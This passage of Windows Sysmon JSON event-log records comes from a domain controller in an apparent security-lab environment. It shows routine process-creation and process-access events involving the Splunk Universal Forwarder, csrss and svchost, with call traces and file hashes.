Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8166,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:54.374\r\nProcessGuid: {A837DB8D-0516-5F25-0000-0010322A1300}\r\nProcessId: 3388\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:00:54.374","ProcessGuid":"{A837DB8D-0516-5F25-0000-0010322A1300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8167,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:54.372\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-04EA-5F25-0000-00103ED91100}\r\nTargetProcessId: 3388\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:54.372","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-04EA-5F25-0000-00103ED91100}","TargetProcessId":"3388","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8168,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:54.372\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04EA-5F25-0000-00103ED91100}\r\nTargetProcessId: 3388\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:54.372","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04EA-5F25-0000-00103ED91100}","TargetProcessId":"3388","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8169,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:54.372\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:54.372","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8170,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:54.372\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:54.372","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8171,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:54.372\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:54.372","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8172,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:54.372\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:54.372","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8173,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:54.372\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:54.372","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8174,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:54.372\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 